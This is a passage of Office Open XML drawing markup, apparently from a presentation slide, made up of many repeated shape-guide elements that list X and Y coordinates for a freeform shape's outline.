              <a:gd name="connsiteX77" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 440396 w 1349253"/>
